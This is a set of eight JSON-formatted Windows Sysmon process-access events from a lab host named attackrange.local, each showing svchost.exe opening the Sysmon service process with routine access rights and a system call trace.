{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1490,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1491,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1492,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1493,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1494,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1495,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1496,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1497,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
